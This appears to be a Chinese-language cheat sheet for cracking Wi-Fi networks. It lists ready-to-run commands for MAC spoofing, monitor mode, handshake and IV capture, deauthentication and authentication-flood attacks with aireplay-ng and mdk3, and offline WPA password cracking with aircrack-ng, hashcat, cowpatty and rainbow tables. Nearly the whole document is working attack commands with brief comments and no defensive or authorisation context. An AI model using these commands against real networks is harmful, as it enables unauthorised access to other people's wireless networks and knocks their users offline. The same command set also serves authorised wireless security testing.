文章目录

wifi工具套装,如果有好的显卡如nVIDIA可以选择安装Pyrit以加速破解

https://github.com/FluxionNetwork/fluxion

iwconfig  # 查看有无无线网卡
macchanger --mac 00:11:22:33:44:55 wlan0  # 更改mac地址
ifconfig wlan0 up  # 激活无线网卡
airmon-ng start wlan0  # 将网卡设为monitor模式,之后使用mon0替代名称wlan0
airodump-ng mon0 -t wpa  # 查看附近的无线网络,需要记录下MAC和Channel,MB列后面有个点'54e.'即是开启了wps功能!
airodump-ng -ivs -w file -c 6 --bssid MAC mon0 # 只捕获ivs数据包并保存到文件file,-c:ap的工作频段
aireplay-ng -0 1 -a AP_MAC -c Client_MAC mon0  # deauth攻击1次,迫使有效客户断开重新申请验证以截获该重要数据!
aireplay-ng -1 0 -e SSID -a BSSID -h AP_MAC mon0  # -1:表示伪验证,0表示重新验证时间.在无客户端连接情况下使用这两个
aireplay-ng -3 -b AP_MAC -h Client_MAC mon0  # 进行arprequest攻击,以加快有效数据包的生成!
aircrack-ng -w wordlist xx.cap/xxx.ivs  # 破解捕获到的cap或ivs文件,-w:字典文件;也可以基于hashtable破解,见cowplay
mdk3  # Authentication攻击
airmon-ng wlan0 up  # 将网卡设为monitor模式
mdk3 mon0 a -a AP_MAC -s 40  # a:Authentication攻击模式,-a:AP的物理地址,-s:发送数据包的速率可以不填
mdk3 mon0 d -c 1  # d:Deauthentication攻击(客户端得不到验证),-c:信道,发送速率根据网卡的性能一般在15-200/s

Hashcat

基于字典的多种hash算法破解,使用方法见–help.如果出现无法定位等问题请升级显卡驱动程序

https://hashcat.net/hashcat/

# hashcat [options] hashfile [mask|wordlists|directories]
hashcat --hash-type 2500 --attack-mode 0 demo.hccap dict1.txt dict2.txt
hashcat -m 2500 -a 3 --pw-min 6 --pw-max 8 demo.hccap pengbo?l?l  # 6-8小写字母,知道了前六位
cudahashcat -m 2500 -a 3 demo.hccap demo.hcmask  # 貌似只支持cudahashcat
# --gpu-accel  16
# --gpu-loops  256
# --segment-size 512

cowpatty

基于hashtable的快速破解

cowpatty -d file.hash -r file.cap -s SSID
aircrack-ng -r my.hash 123.cap

airolib-ng  # 先构建hashtable,增加破解速度,但生成速度很慢
airolib-ng my --import essid ssid.txt  # 里面存放待破解的无线SSID
airolib-ng my --import passwd wordlist.txt  # 很慢
airolib-ng my --clean all
airolib-ng my --batch

# linux上声称wpahash工具,属于cowpatty,需先安装libcap
genpmk -f wordlist.txt -d hashfile.hash -s ssid

# hashtable生成器
# hashtable: https://www.freerainbowtables.com/
rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index
rtgen md5 loweralpha-numeric 1 5 0 3800 33554432 0
rtsort *.rt

# 该密码生成工具语法类似于hashcat,Build-inCharset: ?l ?u ?d ?s ?a
# -o  output file
# -i   enable increment mode,如 -i 4:8 表示构建4-8位密码
# -1  同-2 -3 -4,自定义字符集
mp [options] mask
mp32.exe pass?d?d  pass00-pass99